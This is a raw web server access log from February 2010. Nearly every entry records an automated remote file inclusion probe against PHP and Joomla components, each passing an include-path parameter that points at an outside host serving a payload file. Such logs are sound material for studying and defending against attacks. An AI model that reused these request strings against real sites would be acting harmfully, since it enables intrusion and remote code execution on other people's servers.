81.26.209.60 - - [14/Feb/2010:05:26:19 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:26:22 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:26:23 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:26:23 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:27:18 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:27:18 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:27:18 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:27:18 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:27:21 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:27:21 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:27:21 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:27:21 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:27:21 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:28:26 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:28:28 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:28:28 -0800] "GET /logs/access_100203.log//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:28:29 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:28:29 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:28:30 -0800] "GET /logs/access_100203.log//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:28:30 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:28:30 -0800] "GET /logs/access_100202.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:28:31 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:28:33 -0800] "GET /logs/access_100203.log//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:28:35 -0800] "GET /logs/access_100202.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:28:45 -0800] "GET /logs/access_100202.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [14/Feb/2010:05:28:55 -0800] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [14/Feb/2010:05:28:55 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [14/Feb/2010:05:28:55 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:05:29:27 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:05:29:27 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:05:29:27 -0800] "GET /logs/access_100125.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:05:29:37 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:30:51 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:31:32 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:31:38 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:32:02 -0800] "GET /logs/access_100202.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:32:13 -0800] "GET /logs/access_100202.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:32:18 -0800] "GET /logs/access_100202.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [14/Feb/2010:05:32:19 -0800] "GET /logs/access_100129.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [14/Feb/2010:05:32:19 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [14/Feb/2010:05:32:19 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [14/Feb/2010:05:32:24 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [14/Feb/2010:05:32:24 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [14/Feb/2010:05:32:24 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [14/Feb/2010:05:32:30 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [14/Feb/2010:05:33:12 -0800] "GET /logs/access_100107.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:34:33 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:34:33 -0800] "GET /logs//errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:34:33 -0800] "GET /errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [14/Feb/2010:05:36:31 -0800] "GET /blog/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:05:37:04 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:05:37:04 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:05:37:04 -0800] "GET /logs/access_100107.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:37:19 -0800] "GET /logs/access_100104.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:05:37:48 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:05:37:48 -0800] "GET /logs/access_100107.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:05:37:48 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:38:24 -0800] "GET /logs/access_100104.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:38:39 -0800] "GET /logs/access_100104.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:05:40:48 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:05:40:48 -0800] "GET /logs/access.log%20%20//components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:05:40:49 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [14/Feb/2010:05:40:58 -0800] "GET /logs/access_100129.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [14/Feb/2010:05:41:02 -0800] "GET /logs/access_100107.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:05:42:22 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:05:43:10 -0800] "GET /logs/errors.php?error=http://www.sarpifirenze.it/media/ahhe.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:05:43:10 -0800] "GET /errors.php?error=http://www.sarpifirenze.it/media/ahhe.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:44:45 -0800] "GET /logs/access_100129.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:44:45 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:44:46 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:45:05 -0800] "GET /logs/access_100130.log//errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:45:11 -0800] "GET /logs/access_100129.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:45:11 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:45:11 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:05:46:27 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:05:46:47 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:05:46:47 -0800] "GET /logs/access_100120.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:05:46:47 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:47:57 -0800] "GET /logs/access_100127.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:47:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:47:57 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:48:23 -0800] "GET /logs/access_100124.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:05:49:49 -0800] "GET /logs/access_100205.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:05:49:50 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:05:49:51 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:05:50:37 -0800] "GET /inc/pipe.php?HCL_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:05:50:37 -0800] "GET /logs/inc/pipe.php?HCL_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:05:50:37 -0800] "GET /logs/access_100112.log/inc/pipe.php?HCL_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:05:50:38 -0800] "GET /inc/pipe.php?HCL_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:05:50:38 -0800] "GET /logs/access_100112.log/inc/pipe.php?HCL_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:05:50:38 -0800] "GET /logs/inc/pipe.php?HCL_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:05:51:03 -0800] "GET /logs/access_100118.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:05:52:08 -0800] "GET /logs/access_100105.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:54:11 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:54:11 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:54:11 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:54:23 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:54:23 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:54:24 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:05:54:33 -0800] "GET /logs/access_100112.log%20%20/index2.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:05:54:33 -0800] "GET /logs/index2.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:05:54:34 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 2875 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:05:54:39 -0800] "GET /logs/access_100124.log%20%20/index2.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:54:50 -0800] "GET /logs/access_100129.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:54:50 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:54:50 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:05:56:21 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:05:56:21 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:05:56:21 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:05:56:21 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:05:56:21 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:05:56:21 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:56:49 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:56:52 -0800] "GET /logs/access_100129.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:56:52 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:05:56:53 -0800] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:05:56:54 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:05:56:54 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:05:56:54 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
